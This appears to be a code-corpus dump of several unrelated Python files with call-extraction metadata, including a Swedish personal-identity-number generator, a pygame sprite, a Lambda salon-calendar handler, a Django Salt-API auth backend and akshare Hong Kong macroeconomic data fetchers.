import models\n'), ((2702, 2733), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (2718, 2733), False, 'from django.db import models\n'), ((2753, 2775), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {}), '()\n', (2773, 2775), False, 'from django.db import models\n'), ((2788, 2820), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(250)'}), '(max_length=250)\n', (2804, 2820), False, 'from django.db import models\n'), ((2838, 2869), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (2854, 2869), False, 'from django.db import models\n'), ((2890, 2921), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(75)'}), '(max_length=75)\n', (2906, 2921), False, 'from django.db import models\n'), ((2946, 2977), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(75)'}), '(max_length=75)\n', (2962, 2977), False, 'from django.db import models\n'), ((3002, 3045), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(75)', 'default': '""""""'}), "(max_length=75, default='')\n", (3018, 3045), False, 'from django.db import models\n'), ((3071, 3102), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(75)'}), '(max_length=75)\n', (3087, 3102), False, 'from django.db import models\n'), ((3131, 3175), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(250)', 'default': '""""""'}), "(max_length=250, default='')\n", (3147, 3175), False, 'from django.db import models\n'), ((3201, 3244), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)', 'default': '""""""'}), "(max_length=50, default='')\n", (3217, 3244), False, 'from django.db import models\n'), ((3265, 3296), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'null': '(True)'}), '(null=True)\n', (3285, 3296), False, 'from django.db import models\n'), ((3316, 3355), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (3336, 3355), False, 'from django.db import models\n'), ((3376, 3411), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)'}), '(auto_now=True)\n', (3396, 3411), False, 'from django.db import models\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Creates a valid national identification number for
Sweden (personal identity number, called personnummer in swedish)
http://sv.wikipedia.org/wiki/Personnummer_i_Sverige
http://en.wikipedia.org/wiki/Personal_identity_number_%28Sweden%29
"""
from random import randint
from datetime import datetime, timedelta
def get_random_date_of_birth():
age = (randint(18, 65) * 365) + randint(-182, 182)
date = datetime.now() - timedelta(days=age)
y = date.year
m = date.month
d = date.day
return "".join(["{0:{fill}{width}}".format(x, fill=0, width=2) for x in [y, m, d]])
def get_random_number_of_birth():
n = randint(1, 999)
n = "{0:{fill}{width}}".format(n, fill=0, width=3)
return n
def get_control_digit(date_of_birth, number_of_birth):
factor = 2
digits = ""
for n in date_of_birth + number_of_birth:
digits += str(int(n) * factor)
factor = 1 if factor == 2 else 2
sum = 0
for n in digits:
sum += int(n)
control_digit = 10 - (sum % 10)
control_digit = control_digit if control_digit < 10 else 0
return str(control_digit)
def get_punctuation_for_date(date):
year = int(date[:4])
age = datetime.now().year - year
return "-" if age < 100 else "+"
if __name__ == '__main__':
import sys
date_of_birth = get_random_date_of_birth()
number_of_birth = get_random_number_of_birth()
if len(sys.argv) == 2:
param = sys.argv[1]
if '-' in param:
date_of_birth, number_of_birth = param.split('-')
if len(number_of_birth) == 4:
number_of_birth = number_of_birth[:3]
else:
date_of_birth = param
if len(date_of_birth) != 8:
raise ValueError('Use yyyymmdd format')
control_digit = get_control_digit(date_of_birth[2:],
number_of_birth)
punctuation = get_punctuation_for_date(date_of_birth)
print("".join([date_of_birth,
punctuation,
number_of_birth,
control_digit]))
# vi: set fileencoding=utf-8 :
|
[
"datetime.datetime.now",
"random.randint",
"datetime.timedelta"
] |
[((682, 697), 'random.randint', 'randint', (['(1)', '(999)'], {}), '(1, 999)\n', (689, 697), False, 'from random import randint\n'), ((429, 447), 'random.randint', 'randint', (['(-182)', '(182)'], {}), '(-182, 182)\n', (436, 447), False, 'from random import randint\n'), ((459, 473), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (471, 473), False, 'from datetime import datetime, timedelta\n'), ((476, 495), 'datetime.timedelta', 'timedelta', ([], {'days': 'age'}), '(days=age)\n', (485, 495), False, 'from datetime import datetime, timedelta\n'), ((404, 419), 'random.randint', 'randint', (['(18)', '(65)'], {}), '(18, 65)\n', (411, 419), False, 'from random import randint\n'), ((1240, 1254), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1252, 1254), False, 'from datetime import datetime, timedelta\n')]
|
#!/usr/bin/env python2
import math
import pygame
from random import random
import pygame.sprite
from pygame import Rect
from pygame import Surface
import lib.GameWorld
from lib.Colors import Colors
from lib.CachedAsset import load_cached_asset
# Class reprenting an obstacle between the fluid pools
class Obstacle(pygame.sprite.Sprite):
Y_VARIABILITY = 10
Y_BIAS_MULT = 1.8
def __init__(self, width, height):
super(Obstacle, self).__init__()
self.obstacletxt = load_cached_asset("assets/img/obstacle4.png")
self.create(width, height),
def create(self, width, height):
# Sculpt a obstacle into a surface (width w, height w), initially
# a solid block, by subtracting from each pixel column, in the
# left hand side and right hand side of the rect separately.
# YVAR is the maximum variability from a straight diagonal
# line (to either side), Y_BIAS_MULT determines how flat-
# topped the obstacles are. Returns the surface.
sfc = Surface((width, height))
self.rect = sfc.get_rect();
self.rect.bottom = lib.GameWorld.GameWorld.GAME_HEIGHT
lhs, rhs = self.splitRectVertically(Rect(0, 0, width, height))
drop_per_x = float(rhs.height) / rhs.width
YVAR = 10
Y_BIAS_MULT = 2.0
sfc.blit(self.obstacletxt, (0, 0))
sfc.set_colorkey(Colors.GREEN)
# Generate obstacle
for side in (lhs, rhs):
last_y = -1
startx = side.left
i_mult = 1
if (side == lhs):
startx = side.right-1
i_mult = -1
for i in xrange(side.width):
x = startx+(i*i_mult)
y = side.top + i*drop_per_x
reverse_progress = ((1.0 - float(i) / side.width) * 100 + 1)
reverse_progress_log = math.log(reverse_progress, 100)
ybias = -reverse_progress_log * YVAR * Y_BIAS_MULT
yjitter = (YVAR - random()*YVAR*2 + ybias)
y = round(y + yjitter)
if (y < last_y):
y = last_y
last_y = y
sfc.fill(Colors.GREEN, Rect(x, side.top, 1, y-side.top))
self.image = sfc;
def splitRectVertically(self, rect):
lhs = Rect(rect.left, rect.top, rect.centerx-rect.left, rect.height)
rhs = Rect(rect.centerx, rect.top, rect.right-rect.centerx, rect.height)
return (lhs, rhs)
def draw(self, surface, x):
self.rect.left = x
surface.blit(self.image, self.rect)
|
[
"pygame.Surface",
"lib.CachedAsset.load_cached_asset",
"pygame.Rect",
"random.random",
"math.log"
] |
[((475, 520), 'lib.CachedAsset.load_cached_asset', 'load_cached_asset', (['"""assets/img/obstacle4.png"""'], {}), "('assets/img/obstacle4.png')\n", (492, 520), False, 'from lib.CachedAsset import load_cached_asset\n'), ((964, 988), 'pygame.Surface', 'Surface', (['(width, height)'], {}), '((width, height))\n', (971, 988), False, 'from pygame import Surface\n'), ((1984, 2048), 'pygame.Rect', 'Rect', (['rect.left', 'rect.top', '(rect.centerx - rect.left)', 'rect.height'], {}), '(rect.left, rect.top, rect.centerx - rect.left, rect.height)\n', (1988, 2048), False, 'from pygame import Rect\n'), ((2055, 2123), 'pygame.Rect', 'Rect', (['rect.centerx', 'rect.top', '(rect.right - rect.centerx)', 'rect.height'], {}), '(rect.centerx, rect.top, rect.right - rect.centerx, rect.height)\n', (2059, 2123), False, 'from pygame import Rect\n'), ((1115, 1140), 'pygame.Rect', 'Rect', (['(0)', '(0)', 'width', 'height'], {}), '(0, 0, width, height)\n', (1119, 1140), False, 'from pygame import Rect\n'), ((1640, 1671), 'math.log', 'math.log', (['reverse_progress', '(100)'], {}), '(reverse_progress, 100)\n', (1648, 1671), False, 'import math\n'), ((1882, 1916), 'pygame.Rect', 'Rect', (['x', 'side.top', '(1)', '(y - side.top)'], {}), '(x, side.top, 1, y - side.top)\n', (1886, 1916), False, 'from pygame import Rect\n'), ((1749, 1757), 'random.random', 'random', ([], {}), '()\n', (1755, 1757), False, 'from random import random\n')]
|
import sys
import os
import re
import getpass
import datetime
import re
import pandas as pd
# mf packages
# TODO - remove this dedendency if opensource
try:
from mf_file_utilities import applauncher_wrapper as aw
except:
pass
def get_user():
return getpass.getuser()
def date():
return datetime.datetime.now().strftime('%Y%m%d')
# extracted from mf_modules ##################################
# from mf_modules.file_operations import open_file
def open_file(filename):
"""Open document with default application in Python."""
if sys.platform == 'linux' and str(type(aw))== "<class 'module'>":
aw.open_file(filename)
# note. this is an MF custom App for opening folders and files
# from a Linux file server on the local network
else:
try:
os.startfile(filename)
except AttributeError:
subprocess.call(['open', filename])
# from mf_modules.file_operations import jobno_fromdir
def jobno_fromdir(fdir):
'''
returns the job number from a given file directory
Args:
fdir (filepath): file-directory
Returns:
job associated to file-directory
Code:
re.findall("[J][0-9][0-9][0-9][0-9]", txt)
'''
matches = re.findall("[J][0-9][0-9][0-9][0-9]", fdir)
if len(matches) == 0:
job_no = 'J4321'
else:
job_no = matches[0]
return job_no
##############################################################
def xlsxtemplated_check(fpth):
from openpyxl import load_workbook
wb = load_workbook(fpth)
if wb.properties.keywords is not None and 'xlsxtemplater' in wb.properties.keywords:
return True
else:
return False
def from_excel(fpth):
"""
reads back in pandas tables that have been output using xlsxtemplater.to_excel
Args:
fpth(str): xl fpth
Returns:
li(list): of the format below
li = {'sheet_name':'name','description':'dataframe description','df':'pd.DataFrame'}
"""
if not xlsxtemplated_check(fpth):
print('{} --> not created by xlsxtemplater'.format(fpth))
return None
cols = ['sheet_name','description']
df_readme = pd.read_excel(fpth,sheet_name='readme')
li = []
for index, row in df_readme.iterrows():
tmp = row.to_dict()
tmp['df'] = pd.read_excel(fpth,sheet_name=row.sheet_name)
li.append(tmp)
return li
|
[
"getpass.getuser",
"openpyxl.load_workbook",
"pandas.read_excel",
"re.findall",
"mf_file_utilities.applauncher_wrapper.open_file",
"datetime.datetime.now",
"os.startfile"
] |
[((264, 281), 'getpass.getuser', 'getpass.getuser', ([], {}), '()\n', (279, 281), False, 'import getpass\n'), ((1259, 1302), 're.findall', 're.findall', (['"""[J][0-9][0-9][0-9][0-9]"""', 'fdir'], {}), "('[J][0-9][0-9][0-9][0-9]', fdir)\n", (1269, 1302), False, 'import re\n'), ((1553, 1572), 'openpyxl.load_workbook', 'load_workbook', (['fpth'], {}), '(fpth)\n', (1566, 1572), False, 'from openpyxl import load_workbook\n'), ((2201, 2241), 'pandas.read_excel', 'pd.read_excel', (['fpth'], {'sheet_name': '"""readme"""'}), "(fpth, sheet_name='readme')\n", (2214, 2241), True, 'import pandas as pd\n'), ((630, 652), 'mf_file_utilities.applauncher_wrapper.open_file', 'aw.open_file', (['filename'], {}), '(filename)\n', (642, 652), True, 'from mf_file_utilities import applauncher_wrapper as aw\n'), ((2345, 2391), 'pandas.read_excel', 'pd.read_excel', (['fpth'], {'sheet_name': 'row.sheet_name'}), '(fpth, sheet_name=row.sheet_name)\n', (2358, 2391), True, 'import pandas as pd\n'), ((306, 329), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (327, 329), False, 'import datetime\n'), ((823, 845), 'os.startfile', 'os.startfile', (['filename'], {}), '(filename)\n', (835, 845), False, 'import os\n')]
|
import logging
import json
import os
from datetime import datetime
from common import (common_const, utils)
from validation import hair_salon_param_check as validation
from hair_salon.hair_salon_staff_reservation import HairSalonStaffReservation
# ็ฐๅขๅคๆฐ
HAIR_SALON_STAFF_RESERVATION_DB = os.environ.get("HAIR_SALON_STAFF_RESERVATION_DB") # noqa 501
LOGGER_LEVEL = os.environ.get("LOGGER_LEVEL")
# ใญใฐๅบๅใฎ่จญๅฎ
logger = logging.getLogger()
if LOGGER_LEVEL == 'DEBUG':
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
# ใใผใใซๆไฝใฏใฉในใฎๅๆๅ
staff_reservation_table_controller = HairSalonStaffReservation()
def get_staff_calendar(params):
"""
DBใใในใฟใใใฎไบ็ดๆ
ๅ ฑใๅๅพใใๆฅๆฏใซ็ฉบใใใใใๅคๅฎใใ็ตๆใ่ฟใ
Params
-------
params:dict
ใใญใณใใใใฎใใฉใกใผใฟ็พค
Returns
-------
return_calendar:dict
{ใซใฉใ ๅ: ๅค}ใฎใชในใ
"""
# ๆๅฎใใในใฟใใIDใฎๅธๆๆใฎ็ฉบใๆ
ๅ ฑใDBใใๅๅพใใ
staff_calendar = staff_reservation_table_controller.query_index_staff_id_reserved_year_month( # noqa501
int(params['staffId']), params['preferredYearMonth']
)
course_minutes = int(params['courseMinutes'])
# ใซใฌใณใใผใฏๅธๆๆๅ
ใฎใใผใฟใฎใฟ่ฟๅดใใ
return_calendar = {'calendarYearMonth': params['preferredYearMonth']}
return_calendar['calendarDays'] = []
for staff_reservation_info in staff_calendar:
# ไบ็ดใณใผในใฎๆฝ่กๆ้ใๆ
ๅฝในใฟใใใฎๆๅคง็ฉบใๆ้ไปฅๅ
ใใใงใใฏ
reservable_time_term = int(
staff_reservation_info['reservableTimeTerm'])
if reservable_time_term < course_minutes:
vacancy_flg = 0
else:
vacancy_flg = 1
reserved_day = datetime.strptime(
staff_reservation_info['reservedDay'], '%Y-%m-%d')
return_day = reserved_day.day
return_calendar['calendarDays'].append({'day': int(return_day),
'vacancyFlg': vacancy_flg})
return return_calendar
def lambda_handler(event, context):
"""
ในใฟใใใฎๆฅๆฏใฎ็ฉบใๆ
ๅ ฑใ่ฟๅดใใ
Parameters
----------
event : dict
ใใญใณใใใใฎใใฉใกใผใฟ็พค
context : dict
ใณใณใใญในใๅ
ๅฎนใ
Returns
-------
return_calendar : dict
ในใฟใใใฎๆฅๆฏใฎ็ฉบใๆ
ๅ ฑ๏ผไบ็ดใใใๆฅใฎใฟ็ฉบใๆ็กใฎๅคๅฎ็ตๆใ่ฟใ๏ผ
"""
# ใใฉใกใผใฟใญใฐใใใงใใฏ
logger.info(event)
req_param = event['queryStringParameters']
if req_param is None:
error_msg_display = common_const.const.MSG_ERROR_NOPARAM
return utils.create_error_response(error_msg_display, 400)
param_checker = validation.HairSalonParamCheck(req_param) # noqa 501
if error_msg := param_checker.check_api_staff_calendar_get():
error_msg_display = ('\n').join(error_msg)
logger.error(error_msg_display)
return utils.create_error_response(error_msg_display, 400)
try:
# ในใฟใใIDใงๅธๆๆใฎในใฟใใใฎ็ฉบใๆ
ๅ ฑใๅๅพใใ
staff_calendar = get_staff_calendar(req_param)
except Exception as e:
logger.exception('Occur Exception: %s', e)
return utils.create_error_response('Error')
body = json.dumps(
staff_calendar,
default=utils.decimal_to_int,
ensure_ascii=False)
return utils.create_success_response(body)
|
[
"common.utils.create_success_response",
"hair_salon.hair_salon_staff_reservation.HairSalonStaffReservation",
"validation.hair_salon_param_check.HairSalonParamCheck",
"json.dumps",
"os.environ.get",
"datetime.datetime.strptime",
"common.utils.create_error_response",
"logging.getLogger"
] |
[((288, 337), 'os.environ.get', 'os.environ.get', (['"""HAIR_SALON_STAFF_RESERVATION_DB"""'], {}), "('HAIR_SALON_STAFF_RESERVATION_DB')\n", (302, 337), False, 'import os\n'), ((365, 395), 'os.environ.get', 'os.environ.get', (['"""LOGGER_LEVEL"""'], {}), "('LOGGER_LEVEL')\n", (379, 395), False, 'import os\n'), ((415, 434), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (432, 434), False, 'import logging\n'), ((592, 619), 'hair_salon.hair_salon_staff_reservation.HairSalonStaffReservation', 'HairSalonStaffReservation', ([], {}), '()\n', (617, 619), False, 'from hair_salon.hair_salon_staff_reservation import HairSalonStaffReservation\n'), ((2414, 2455), 'validation.hair_salon_param_check.HairSalonParamCheck', 'validation.HairSalonParamCheck', (['req_param'], {}), '(req_param)\n', (2444, 2455), True, 'from validation import hair_salon_param_check as validation\n'), ((2935, 3011), 'json.dumps', 'json.dumps', (['staff_calendar'], {'default': 'utils.decimal_to_int', 'ensure_ascii': '(False)'}), '(staff_calendar, default=utils.decimal_to_int, ensure_ascii=False)\n', (2945, 3011), False, 'import json\n'), ((3048, 3083), 'common.utils.create_success_response', 'utils.create_success_response', (['body'], {}), '(body)\n', (3077, 3083), False, 'from common import common_const, utils\n'), ((1575, 1643), 'datetime.datetime.strptime', 'datetime.strptime', (["staff_reservation_info['reservedDay']", '"""%Y-%m-%d"""'], {}), "(staff_reservation_info['reservedDay'], '%Y-%m-%d')\n", (1592, 1643), False, 'from datetime import datetime\n'), ((2341, 2392), 'common.utils.create_error_response', 'utils.create_error_response', (['error_msg_display', '(400)'], {}), '(error_msg_display, 400)\n', (2368, 2392), False, 'from common import common_const, utils\n'), ((2640, 2691), 'common.utils.create_error_response', 'utils.create_error_response', (['error_msg_display', '(400)'], {}), '(error_msg_display, 400)\n', (2667, 2691), False, 'from common import common_const, utils\n'), ((2886, 2922), 'common.utils.create_error_response', 'utils.create_error_response', (['"""Error"""'], {}), "('Error')\n", (2913, 2922), False, 'from common import common_const, utils\n')]
|
import nox
@nox.session(python=False)
def tests(session):
session.run('poetry', 'install')
session.run('poetry', 'run', 'pytest')
|
[
"nox.session"
] |
[((14, 39), 'nox.session', 'nox.session', ([], {'python': '(False)'}), '(python=False)\n', (25, 39), False, 'import nox\n')]
|
from django.contrib.auth.backends import ModelBackend
from django.contrib.auth.models import User
from salt_observer.saltapis import SaltCherrypy, SaltTornado
class RestBackend(ModelBackend):
''' Authenticate against salt-api-permissions '''
def authenticate(self, username=None, password=None, request=None):
try:
cherrypy_token = SaltCherrypy(username, password).token
tornado_token = SaltTornado(username, password).token
except Exception as e:
cherrypy_token = False
tornado_token = False
if cherrypy_token and tornado_token:
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
user = User.objects.create_user(username=username, email='', password=password)
request.session['salt_cherrypy_token'] = cherrypy_token
request.session['salt_tornado_token'] = tornado_token
return user
return None
|
[
"salt_observer.saltapis.SaltCherrypy",
"salt_observer.saltapis.SaltTornado",
"django.contrib.auth.models.User.objects.get",
"django.contrib.auth.models.User.objects.create_user"
] |
[((365, 397), 'salt_observer.saltapis.SaltCherrypy', 'SaltCherrypy', (['username', 'password'], {}), '(username, password)\n', (377, 397), False, 'from salt_observer.saltapis import SaltCherrypy, SaltTornado\n'), ((432, 463), 'salt_observer.saltapis.SaltTornado', 'SaltTornado', (['username', 'password'], {}), '(username, password)\n', (443, 463), False, 'from salt_observer.saltapis import SaltCherrypy, SaltTornado\n'), ((656, 691), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'username': 'username'}), '(username=username)\n', (672, 691), False, 'from django.contrib.auth.models import User\n'), ((753, 825), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', ([], {'username': 'username', 'email': '""""""', 'password': 'password'}), "(username=username, email='', password=password)\n", (777, 825), False, 'from django.contrib.auth.models import User\n')]
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Date: 2021/12/6 15:21
Desc: ไธญๅฝ-้ฆๆธฏ-ๅฎ่งๆๆ
https://data.eastmoney.com/cjsj/foreign_8_0.html
"""
import pandas as pd
import requests
from akshare.utils import demjson
def macro_china_hk_cpi() -> pd.DataFrame:
"""
ไธๆน่ดขๅฏ-็ปๆตๆฐๆฎไธ่ง-ไธญๅฝ้ฆๆธฏ-ๆถ่ดน่
็ฉไปทๆๆฐ
https://data.eastmoney.com/cjsj/foreign_8_0.html
:return: ๆถ่ดน่
็ฉไปทๆๆฐ
:rtype: pandas.DataFrame
"""
url = "https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx"
params = {
"type": "GJZB",
"sty": "HKZB",
"js": "({data:[(x)],pages:(pc)})",
"p": "1",
"ps": "2000",
"mkt": "8",
"stat": "0",
"pageNo": "1",
"pageNum": "1",
"_": "1621332091873",
}
r = requests.get(url, params=params)
data_text = r.text
data_json = demjson.decode(data_text[1:-1])
temp_df = pd.DataFrame([item.split(",") for item in data_json["data"]])
temp_df.columns = [
"ๆถ้ด",
"ๅๅผ",
"็ฐๅผ",
"ๅๅธๆฅๆ",
]
temp_df['ๅๅผ'] = pd.to_numeric(temp_df['ๅๅผ'])
temp_df['็ฐๅผ'] = pd.to_numeric(temp_df['็ฐๅผ'])
temp_df['ๆถ้ด'] = pd.to_datetime(temp_df['ๆถ้ด']).dt.date
temp_df['ๅๅธๆฅๆ'] = pd.to_datetime(temp_df['ๅๅธๆฅๆ']).dt.date
return temp_df
def macro_china_hk_cpi_ratio() -> pd.DataFrame:
"""
ไธๆน่ดขๅฏ-็ปๆตๆฐๆฎไธ่ง-ไธญๅฝ้ฆๆธฏ-ๆถ่ดน่
็ฉไปทๆๆฐๅนด็
https://data.eastmoney.com/cjsj/foreign_8_1.html
:return: ๆถ่ดน่
็ฉไปทๆๆฐๅนด็
:rtype: pandas.DataFrame
"""
url = "https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx"
params = {
"type": "GJZB",
"sty": "HKZB",
"js": "({data:[(x)],pages:(pc)})",
"p": "1",
"ps": "2000",
"mkt": "8",
"stat": "1",
"pageNo": "1",
"pageNum": "1",
"_": "1621332091873",
}
r = requests.get(url, params=params)
data_text = r.text
data_json = demjson.decode(data_text[1:-1])
temp_df = pd.DataFrame([item.split(",") for item in data_json["data"]])
temp_df.columns = [
"ๆถ้ด",
"ๅๅผ",
"็ฐๅผ",
"ๅๅธๆฅๆ",
]
temp_df['ๅๅผ'] = pd.to_numeric(temp_df['ๅๅผ'])
temp_df['็ฐๅผ'] = pd.to_numeric(temp_df['็ฐๅผ'])
temp_df['ๆถ้ด'] = pd.to_datetime(temp_df['ๆถ้ด']).dt.date
temp_df['ๅๅธๆฅๆ'] = pd.to_datetime(temp_df['ๅๅธๆฅๆ']).dt.date
return temp_df
def macro_china_hk_rate_of_unemployment() -> pd.DataFrame:
"""
ไธๆน่ดขๅฏ-็ปๆตๆฐๆฎไธ่ง-ไธญๅฝ้ฆๆธฏ-ๅคฑไธ็
https://data.eastmoney.com/cjsj/foreign_8_2.html
:return: ๅคฑไธ็
:rtype: pandas.DataFrame
"""
url = "https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx"
params = {
"type": "GJZB",
"sty": "HKZB",
"js": "({data:[(x)],pages:(pc)})",
"p": "1",
"ps": "2000",
"mkt": "8",
"stat": "2",
"pageNo": "1",
"pageNum": "1",
"_": "1621332091873",
}
r = requests.get(url, params=params)
data_text = r.text
data_json = demjson.decode(data_text[1:-1])
temp_df = pd.DataFrame([item.split(",") for item in data_json["data"]])
temp_df.columns = [
"ๆถ้ด",
"ๅๅผ",
"็ฐๅผ",
"ๅๅธๆฅๆ",
]
temp_df['ๅๅผ'] = pd.to_numeric(temp_df['ๅๅผ'])
temp_df['็ฐๅผ'] = pd.to_numeric(temp_df['็ฐๅผ'])
temp_df['ๆถ้ด'] = pd.to_datetime(temp_df['ๆถ้ด']).dt.date
temp_df['ๅๅธๆฅๆ'] = pd.to_datetime(temp_df['ๅๅธๆฅๆ']).dt.date
return temp_df
def macro_china_hk_gbp() -> pd.DataFrame:
"""
ไธๆน่ดขๅฏ-็ปๆตๆฐๆฎไธ่ง-ไธญๅฝ้ฆๆธฏ-้ฆๆธฏ GDP
https://data.eastmoney.com/cjsj/foreign_8_3.html
:return: ้ฆๆธฏ GDP
:rtype: pandas.DataFrame
"""
url = "https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx"
params = {
"type": "GJZB",
"sty": "HKZB",
"js": "({data:[(x)],pages:(pc)})",
"p": "1",
"ps": "2000",
"mkt": "8",
"stat": "3",
"pageNo": "1",
"pageNum": "1",
"_": "1621332091873",
}
r = requests.get(url, params=params)
data_text = r.text
data_json = demjson.decode(data_text[1:-1])
temp_df = pd.DataFrame([item.split(",") for item in data_json["data"]])
temp_df.columns = [
"ๆถ้ด",
"ๅๅผ",
"็ฐๅผ",
"ๅๅธๆฅๆ",
]
temp_df['ๅๅผ'] = pd.to_numeric(temp_df['ๅๅผ']) / 100
temp_df['็ฐๅผ'] = pd.to_numeric(temp_df['็ฐๅผ']) / 100
temp_df['ๆถ้ด'] = pd.to_datetime(temp_df['ๆถ้ด']).dt.date
temp_df['ๅๅธๆฅๆ'] = pd.to_datetime(temp_df['ๅๅธๆฅๆ']).dt.date
return temp_df
def macro_china_hk_gbp_ratio() -> pd.DataFrame:
"""
ไธๆน่ดขๅฏ-็ปๆตๆฐๆฎไธ่ง-ไธญๅฝ้ฆๆธฏ-้ฆๆธฏ GDP ๅๆฏ
https://data.eastmoney.com/cjsj/foreign_8_4.html
:return: ้ฆๆธฏ GDP ๅๆฏ
:rtype: pandas.DataFrame
"""
url = "https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx"
params = {
"type": "GJZB",
"sty": "HKZB",
"js": "({data:[(x)],pages:(pc)})",
"p": "1",
"ps": "2000",
"mkt": "8",
"stat": "4",
"pageNo": "1",
"pageNum": "1",
"_": "1621332091873",
}
r = requests.get(url, params=params)
data_text = r.text
data_json = demjson.decode(data_text[1:-1])
temp_df = pd.DataFrame([item.split(",") for item in data_json["data"]])
temp_df.columns = [
"ๆถ้ด",
"ๅๅผ",
"็ฐๅผ",
"ๅๅธๆฅๆ",
]
temp_df['ๅๅผ'] = pd.to_numeric(temp_df['ๅๅผ'])
temp_df['็ฐๅผ'] = pd.to_numeric(temp_df['็ฐๅผ'])
temp_df['ๆถ้ด'] = pd.to_datetime(temp_df['ๆถ้ด']).dt.date
temp_df['ๅๅธๆฅๆ'] = pd.to_datetime(temp_df['ๅๅธๆฅๆ']).dt.date
return temp_df
def macro_china_hk_building_volume() -> pd.DataFrame:
"""
ไธๆน่ดขๅฏ-็ปๆตๆฐๆฎไธ่ง-ไธญๅฝ้ฆๆธฏ-้ฆๆธฏๆฅผๅฎไนฐๅๅ็บฆๆฐ้
https://data.eastmoney.com/cjsj/foreign_8_5.html
:return: ้ฆๆธฏๆฅผๅฎไนฐๅๅ็บฆๆฐ้
:rtype: pandas.DataFrame
"""
url = "https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx"
params = {
"type": "GJZB",
"sty": "HKZB",
"js": "({data:[(x)],pages:(pc)})",
"p": "1",
"ps": "2000",
"mkt": "8",
"stat": "5",
"pageNo": "1",
"pageNum": "1",
"_": "1621332091873",
}
r = requests.get(url, params=params)
data_text = r.text
data_json = demjson.decode(data_text[1:-1])
temp_df = pd.DataFrame([item.split(",") for item in data_json["data"]])
temp_df.columns = [
"ๆถ้ด",
"ๅๅผ",
"็ฐๅผ",
"ๅๅธๆฅๆ",
]
temp_df['ๅๅผ'] = pd.to_numeric(temp_df['ๅๅผ'])
temp_df['็ฐๅผ'] = pd.to_numeric(temp_df['็ฐๅผ'])
temp_df['ๆถ้ด'] = pd.to_datetime(temp_df['ๆถ้ด']).dt.date
temp_df['ๅๅธๆฅๆ'] = pd.to_datetime(temp_df['ๅๅธๆฅๆ']).dt.date
return temp_df
def macro_china_hk_building_amount() -> pd.DataFrame:
"""
ไธๆน่ดขๅฏ-็ปๆตๆฐๆฎไธ่ง-ไธญๅฝ้ฆๆธฏ-้ฆๆธฏๆฅผๅฎไนฐๅๅ็บฆๆไบค้้ข
https://data.eastmoney.com/cjsj/foreign_8_6.html
:return: ้ฆๆธฏๆฅผๅฎไนฐๅๅ็บฆๆไบค้้ข
:rtype: pandas.DataFrame
"""
url = "https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx"
params = {
"type": "GJZB",
"sty": "HKZB",
"js": "({data:[(x)],pages:(pc)})",
"p": "1",
"ps": "2000",
"mkt": "8",
"stat": "6",
"pageNo": "1",
"pageNum": "1",
"_": "1621332091873",
}
r = requests.get(url, params=params)
data_text = r.text
data_json = demjson.decode(data_text[1:-1])
temp_df = pd.DataFrame([item.split(",") for item in data_json["data"]])
temp_df.columns = [
"ๆถ้ด",
"ๅๅผ",
"็ฐๅผ",
"ๅๅธๆฅๆ",
]
temp_df['ๅๅผ'] = pd.to_numeric(temp_df['ๅๅผ']) / 100
temp_df['็ฐๅผ'] = pd.to_numeric(temp_df['็ฐๅผ']) / 100
temp_df['ๆถ้ด'] = pd.to_datetime(temp_df['ๆถ้ด']).dt.date
temp_df['ๅๅธๆฅๆ'] = pd.to_datetime(temp_df['ๅๅธๆฅๆ']).dt.date
return temp_df
def macro_china_hk_trade_diff_ratio() -> pd.DataFrame:
"""
ไธๆน่ดขๅฏ-็ปๆตๆฐๆฎไธ่ง-ไธญๅฝ้ฆๆธฏ-้ฆๆธฏๅๅ่ดธๆๅทฎ้ขๅนด็
https://data.eastmoney.com/cjsj/foreign_8_7.html
:return: ้ฆๆธฏๅๅ่ดธๆๅทฎ้ขๅนด็
:rtype: pandas.DataFrame
"""
url = "https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx"
params = {
"type": "GJZB",
"sty": "HKZB",
"js": "({data:[(x)],pages:(pc)})",
"p": "1",
"ps": "2000",
"mkt": "8",
"stat": "7",
"pageNo": "1",
"pageNum": "1",
"_": "1621332091873",
}
r = requests.get(url, params=params)
data_text = r.text
data_json = demjson.decode(data_text[1:-1])
temp_df = pd.DataFrame([item.split(",") for item in data_json["data"]])
temp_df.columns = [
"ๆถ้ด",
"ๅๅผ",
"็ฐๅผ",
"ๅๅธๆฅๆ",
]
temp_df['ๅๅผ'] = pd.to_numeric(temp_df['ๅๅผ'])
temp_df['็ฐๅผ'] = pd.to_numeric(temp_df['็ฐๅผ'])
temp_df['ๆถ้ด'] = pd.to_datetime(temp_df['ๆถ้ด']).dt.date
temp_df['ๅๅธๆฅๆ'] = pd.to_datetime(temp_df['ๅๅธๆฅๆ']).dt.date
return temp_df
def macro_china_hk_ppi() -> pd.DataFrame:
"""
